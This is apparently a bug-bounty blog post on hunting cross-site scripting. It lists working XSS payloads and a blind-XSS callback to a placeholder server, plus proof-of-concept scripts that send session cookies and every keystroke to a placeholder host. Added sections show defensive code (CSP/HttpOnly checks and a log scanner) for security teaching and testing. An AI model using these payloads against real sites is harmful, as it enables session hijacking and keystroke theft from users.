XSS isn't just a vulnerability; it's a gold mine for ethical hackers. Ranked as a top critical web security risk, finding XSS in bug bounty programs can be highly profitable. I've personally found and reported XSS flaws that turned into four-figure bounties.
Let's cut to the chase and look at the code that finds these bugs.
The XSS Hunter's Toolkit: Essential Test Payloads
Forget just <script>alert(1)</script>. While it's a classic, modern hunting requires a more nuanced arsenal. Start with these probes to see how a site handles your input.
1. Basic Probe & Classic Alert:
"><xss>
This simple payload helps you see if you can break out of an HTML attribute.
2. The Image Tag Onerror Event:
"><img src=x onerror=alert(document.domain)>
This is a fantastic alternative if <script> tags are blocked. It tries to load an invalid image (src=x), which triggers the onerror event, executing our JavaScript.
3. SVG Payload:
"><svg onload=alert(1)>
SVG tags are legitimate web code and sometimes bypass filters that block standard HTML tags.
4. Blind XSS Callback:
For hidden attack surfaces like admin panels, you need a callback to your server.
"><script src=http://your-xss-server.com/collect.js></script>
Tools like XSS Hunter are perfect for catching these callbacks, proving the script executed, often in a high-privilege context.
My Simple 3-Step Hunting Methodology
Step 1: Find Every Injection Point
Don't just test search bars and comment forms. Think bigger:
- URL parameters (?query=test)
- HTTP Headers (User-Agent, Referer)
- Hidden API endpoints found in JavaScript files
- Form fields everywhere (user profiles, support tickets, checkout pages)
Step 2: Test with Context-Aware Payloads
Your payload must match where your input is injected. A one-size-fits-all approach fails.
- In an HTML Attribute? Break out of it.
"><script>alert(1)</script>
- Inside a JavaScript String? Break out and execute code.
'; alert(1);//
- In a URL? Try to close the existing tag and add a new event.
"></a><img src=x onerror=alert(1)>
Step 3: Craft a Proof of Concept (PoC) That Gets Paid
A simple alert(1) might not convince a security team. Show real impact to get that bounty.
PoC for Session Hijacking:
<script>
fetch('https://your-server.com/steal?cookie=' + btoa(document.cookie))
</script>
This sends the victim's session cookie to your server.
PoC for Keylogging:
<script>
document.addEventListener('keypress', function(e) {
fetch('https://your-server.com/log?key=' + e.key);
});
</script>
This logs and exfiltrates every key pressed by the user.
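Both PoCs above depend on two things being true in the victim's browser: document.cookie exposes the session, and fetch() may reach an arbitrary origin. What follows is an added example, not code from the original post, showing the server-side controls that remove each precondition and a small checker that evaluates a response's headers against the session-hijack PoC. The policy checker is a simplified model of CSP connect-src matching written for this example (scheme and host only, no path or wildcard-subdomain sources); the origins, header values and function names are constructed assumptions.

```javascript
// Added example: the controls that defeat the two PoCs above. HttpOnly keeps
// the session cookie out of document.cookie; CSP connect-src limits where
// fetch() may send data. cspAllowsConnect is a simplified model of CSP source
// matching (scheme + host, 'self', '*', 'none'; no paths or wildcard hosts)
// written for this example. Origins and header values are constructed.

// Set-Cookie header for a session cookie with the flags a defender wants.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Parse a Content-Security-Policy header into { directive: [sources...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Would a script running on pageOrigin be allowed to fetch() targetUrl?
// connect-src governs fetch/XHR/WebSocket and falls back to default-src.
function cspAllowsConnect(policy, pageOrigin, targetUrl) {
  const sources = policy['connect-src'] || policy['default-src'];
  if (!sources) return true; // no applicable directive: unrestricted
  const target = new URL(targetUrl);
  const targetOrigin = `${target.protocol}//${target.host}`;
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return targetOrigin === pageOrigin;
    try {
      // Scheme-less host sources are compared on host alone (simplification).
      const s = new URL(src.includes('://') ? src : `${target.protocol}//${src}`);
      return `${s.protocol}//${s.host}` === targetOrigin;
    } catch {
      return false;
    }
  });
}

// Evaluate the session-hijack PoC against a server's response headers.
function evaluateCookieExfilPoc(cspHeader, setCookieHeader, pageOrigin, exfilUrl) {
  const cookieReadable = !/;\s*HttpOnly\b/i.test(setCookieHeader);
  const requestAllowed = cspAllowsConnect(parseCsp(cspHeader), pageOrigin, exfilUrl);
  return { cookieReadable, requestAllowed, exfilSucceeds: cookieReadable && requestAllowed };
}

// Constructed configurations: a weak one and a hardened one.
const PAGE_ORIGIN = 'https://app.example';
const EXFIL_URL = 'https://your-server.com/steal?cookie=...';
const WEAK = {
  csp: "default-src 'self' 'unsafe-inline'; connect-src *",
  cookie: 'session=abc123; Path=/',
};
const HARDENED = {
  csp: "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'",
  cookie: sessionCookieHeader('session', 'abc123'),
};

console.log('weak    :', evaluateCookieExfilPoc(WEAK.csp, WEAK.cookie, PAGE_ORIGIN, EXFIL_URL));
console.log('hardened:', evaluateCookieExfilPoc(HARDENED.csp, HARDENED.cookie, PAGE_ORIGIN, EXFIL_URL));
```

HttpOnly only neutralizes the cookie PoC; the keylogging PoC never touches document.cookie, so against it the connect-src restriction is what stops the exfiltration, and a script-src without 'unsafe-inline' stops an injected inline <script> block from running at all. None of this replaces the output encoding fix; it is the layer that turns a successful injection into a low-impact finding rather than a session takeover.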
Pro Tip: The Blind XSS Patient Payoff
The most lucrative finds are often Blind XSS. Inject your callback payload into every possible text input (user profiles, support tickets, feedback forms) and wait. It might take days, but when an admin views that data, your payload will fire from their privileged session, leading to a high-value bounty.
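The injection points from Step 1 and the stored fields the Pro Tip targets are also where a defender looks for probe attempts, usually long before a callback ever fires. What follows is an added example, not code from the original post: a scanner that percent-decodes query parameters, checks the User-Agent and Referer fields of access-log lines, and runs stored field values through the same patterns, including the external-script shape of a blind XSS callback. The log lines and the stored field value are constructed samples built from the probes on this page; the assumed log format is NCSA combined, and the pattern list is a deliberately narrow illustration, not a complete XSS signature set.

```javascript
// Added example: scanning the injection points from Step 1 (query string,
// User-Agent, Referer, stored form fields) for the probes used on this page.
// The log lines and field values are constructed samples; PROBE_PATTERNS is a
// deliberately narrow illustrative set, not a complete XSS signature list.

const PROBE_PATTERNS = [
  { name: 'tag-breakout',       re: /["']\s*>\s*</ },                    // "><xss>
  { name: 'event-handler',      re: /<\w+[^>]*\son\w+\s*=/i },           // <img ... onerror=
  { name: 'script-tag',         re: /<script\b/i },
  { name: 'external-script',    re: /<script[^>]+src\s*=/i },            // blind-XSS callback
  { name: 'js-string-breakout', re: /['"]\s*;\s*\w+\(.*\)\s*;?\s*\/\// }, // '; alert(1);//
];

// Percent-decode repeatedly (bounded) so double-encoded probes are seen too;
// "+" is treated as a space as in application/x-www-form-urlencoded.
function normalize(value) {
  let out = String(value).replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out); } catch { break; }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Names of the patterns a single value triggers, in PROBE_PATTERNS order.
function findProbes(value) {
  const v = normalize(value);
  return PROBE_PATTERNS.filter((p) => p.re.test(v)).map((p) => p.name);
}

// NCSA combined log line: client, request line, status, size, referer, user-agent.
const COMBINED_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Scan one access-log line; returns null if it is not in combined format.
function scanLogLine(line) {
  const m = line.match(COMBINED_RE);
  if (!m) return null;
  const [, client, , path, , referer, userAgent] = m;
  const findings = [];
  const query = path.includes('?') ? path.slice(path.indexOf('?') + 1) : '';
  for (const pair of query.split('&').filter(Boolean)) {
    const eq = pair.indexOf('=');            // split on the first "=" only, since
    const key = eq < 0 ? pair : pair.slice(0, eq); // payloads themselves contain "="
    const val = eq < 0 ? '' : pair.slice(eq + 1);
    const hits = findProbes(val);
    if (hits.length) findings.push({ where: `query:${normalize(key)}`, hits });
  }
  for (const [where, value] of [['header:Referer', referer], ['header:User-Agent', userAgent]]) {
    const hits = findProbes(value);
    if (hits.length) findings.push({ where, hits });
  }
  return { client, path, findings };
}

// Constructed sample log lines and a constructed stored profile-field value.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /search?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2024:13:56:01 +0000] "GET /profile HTTP/1.1" 200 1024 "-" "<svg onload=alert(1)>"',
  '198.51.100.4 - - [10/Oct/2024:13:57:12 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "https://app.example/" "Mozilla/5.0"',
];
const STORED_FIELD = '"><script src=http://your-xss-server.com/collect.js></script>';

for (const line of SAMPLE_LOG) console.log(JSON.stringify(scanLogLine(line)));
console.log('stored profile field:', findProbes(STORED_FIELD));
```

Two details matter more than the pattern list. Decoding happens before matching, because the query-string probe arrives percent-encoded and would never match raw, and the header fields are scanned with the same function as the query string, since the post's Step 1 is exactly the list of places a naive search-bar-only check misses. A hit on the external-script pattern in a stored field is worth a ticket on its own: it is the signature of a callback payload waiting for an admin to open the record.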
Final Thought
Finding XSS is a skill honed through practice. Use these code snippets as your starting point, be patient, and always test ethically. The next critical vulnerability is waiting for you to discover it.
Happy Hunting!